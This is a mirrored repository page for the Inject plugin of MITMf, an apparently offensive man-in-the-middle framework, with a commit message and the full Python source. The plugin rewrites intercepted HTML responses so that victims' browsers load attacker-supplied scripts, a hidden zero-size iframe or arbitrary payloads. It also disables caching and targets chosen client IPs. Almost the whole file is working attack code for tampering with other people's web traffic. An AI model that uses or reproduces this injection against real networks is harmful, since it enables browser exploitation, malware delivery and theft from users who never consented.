mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 13:02:24 -07:00
The way MITMf hooks SSLstrip's functions has been modified to improve plugin code readability, additionally corrected some useless function hooks that were placed in early framework realeases and never removed. Replace plugin has been given it's own section in the config file currently the BeedAutorun and Javapwn plugins have to be cleaned up... BrowserProfile plugin's Pinlady code has been updated to the latest version (v0.9.0) and will now detect Flash player's version Javapwn plugin will be renamed to BrowserPwn and will support Flash exploits too , as supposed to only Java exploits Since we now have a built in SMB server, removed options to specify a host in the SMBauth plugin Tweaked the output of some plugins
164 lines
6.6 KiB
Python
164 lines
6.6 KiB
Python
#!/usr/bin/env python2.7
|
|
|
|
# Copyright (c) 2014-2016 Marcello Salvati
|
|
#
|
|
# This program is free software; you can redistribute it and/or
|
|
# modify it under the terms of the GNU General Public License as
|
|
# published by the Free Software Foundation; either version 3 of the
|
|
# License, or (at your option) any later version.
|
|
#
|
|
# This program is distributed in the hope that it will be useful, but
|
|
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
# General Public License for more details.
|
|
#
|
|
# You should have received a copy of the GNU General Public License
|
|
# along with this program; if not, write to the Free Software
|
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
# USA
|
|
#
|
|
|
|
import logging
|
|
import time
|
|
import re
|
|
import sys
|
|
import argparse
|
|
|
|
from core.utils import SystemConfig
|
|
from plugins.plugin import Plugin
|
|
from plugins.CacheKill import CacheKill
|
|
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
|
|
|
mitmf_logger = logging.getLogger("mitmf")
|
|
|
|
class Inject(Plugin):
|
|
name = "Inject"
|
|
optname = "inject"
|
|
desc = "Inject arbitrary content into HTML content"
|
|
version = "0.2"
|
|
has_opts = True
|
|
|
|
def initialize(self, options):
|
|
'''Called if plugin is enabled, passed the options namespace'''
|
|
self.options = options
|
|
self.our_ip = SystemConfig.getIP(options.interface)
|
|
self.html_src = options.html_url
|
|
self.js_src = options.js_url
|
|
self.rate_limit = options.rate_limit
|
|
self.count_limit = options.count_limit
|
|
self.per_domain = options.per_domain
|
|
self.black_ips = options.black_ips
|
|
self.white_ips = options.white_ips
|
|
self.match_str = "</body>" or options.match_str
|
|
self.html_payload = options.html_payload
|
|
self.ctable = {}
|
|
self.dtable = {}
|
|
self.count = 0
|
|
self.mime = "text/html"
|
|
|
|
if not options.preserve_cache:
|
|
cachekill = CacheKill()
|
|
cachekill.initialize(options)
|
|
ProxyPlugins.getInstance().addPlugin(cachekill)
|
|
|
|
def serverResponse(self, response, request, data):
|
|
#We throttle to only inject once every two seconds per client
|
|
#If you have MSF on another host, you may need to check prior to injection
|
|
#print "http://" + response.client.getRequestHostname() + response.uri
|
|
ip, hn, mime = self._get_req_info(response)
|
|
if self._should_inject(ip, hn, mime) and self._ip_filter(ip) and (hn not in self.our_ip):
|
|
if (not self.js_src == self.html_src is not None or not self.html_payload == ""):
|
|
data = self._insert_html(data, post=[(self.match_str, self._get_payload())])
|
|
self.ctable[ip] = time.time()
|
|
self.dtable[ip+hn] = True
|
|
self.count += 1
|
|
mitmf_logger.info("{} [{}] Injected malicious html: {}".format(ip, self.name, hn))
|
|
|
|
return {'response': response, 'request':request, 'data': data}
|
|
|
|
def _get_payload(self):
|
|
return self._get_js() + self._get_iframe() + self.html_payload
|
|
|
|
def _ip_filter(self, ip):
|
|
|
|
if self.white_ips is not None:
|
|
if ip in self.white_ips.split(','):
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
if self.black_ips is not None:
|
|
if ip in self.black_ips.split(','):
|
|
return False
|
|
else:
|
|
return True
|
|
|
|
return True
|
|
|
|
def _should_inject(self, ip, hn, mime):
|
|
|
|
if self.count_limit == self.rate_limit is None and not self.per_domain:
|
|
return True
|
|
|
|
if self.count_limit is not None and self.count > self.count_limit:
|
|
return False
|
|
|
|
if self.rate_limit is not None:
|
|
if ip in self.ctable and time.time()-self.ctable[ip] < self.rate_limit:
|
|
return False
|
|
|
|
if self.per_domain:
|
|
return not ip+hn in self.dtable
|
|
|
|
return mime.find(self.mime) != -1
|
|
|
|
def _get_req_info(self, response):
|
|
ip = response.getClientIP()
|
|
hn = response.getRequestHostname()
|
|
mime = response.headers['Content-Type']
|
|
return (ip, hn, mime)
|
|
|
|
def _get_iframe(self):
|
|
if self.html_src is not None:
|
|
return '<iframe src="%s" height=0%% width=0%%></iframe>' % (self.html_src)
|
|
return ''
|
|
|
|
def _get_js(self):
|
|
if self.js_src is not None:
|
|
return '<script type="text/javascript" src="%s"></script>' % (self.js_src)
|
|
return ''
|
|
|
|
def _insert_html(self, data, pre=[], post=[], re_flags=re.I):
|
|
'''
|
|
To use this function, simply pass a list of tuples of the form:
|
|
|
|
(string/regex_to_match,html_to_inject)
|
|
|
|
NOTE: Matching will be case insensitive unless differnt flags are given
|
|
|
|
The pre array will have the match in front of your injected code, the post
|
|
will put the match behind it.
|
|
'''
|
|
pre_regexes = [re.compile(r"(?P<match>"+i[0]+")", re_flags) for i in pre]
|
|
post_regexes = [re.compile(r"(?P<match>"+i[0]+")", re_flags) for i in post]
|
|
|
|
for i, r in enumerate(pre_regexes):
|
|
data = re.sub(r, "\g<match>"+pre[i][1], data)
|
|
|
|
for i, r in enumerate(post_regexes):
|
|
data = re.sub(r, post[i][1]+"\g<match>", data)
|
|
|
|
return data
|
|
|
|
def pluginOptions(self, options):
|
|
options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")
|
|
options.add_argument("--html-url", type=str, help="Location of your (presumably) malicious HTML. Injected via hidden iframe.")
|
|
options.add_argument("--html-payload", type=str, default=None, help="String you would like to inject.")
|
|
options.add_argument("--match-str", type=str, default=None, help="String you would like to match and place your payload before. (</body> by default)")
|
|
options.add_argument("--preserve-cache", action="store_true", help="Don't kill the server/client caching.")
|
|
group = options.add_mutually_exclusive_group(required=False)
|
|
group.add_argument("--per-domain", action="store_true", default=False, help="Inject once per domain per client.")
|
|
group.add_argument("--rate-limit", type=float, default=None, help="Inject once every RATE_LIMIT seconds per client.")
|
|
group.add_argument("--count-limit", type=int, default=None, help="Inject only COUNT_LIMIT times per client.")
|
|
group.add_argument("--white-ips", type=str, default=None, help="Inject content ONLY for these ips")
|
|
group.add_argument("--black-ips", type=str, default=None, help="DO NOT inject content for these ips")
|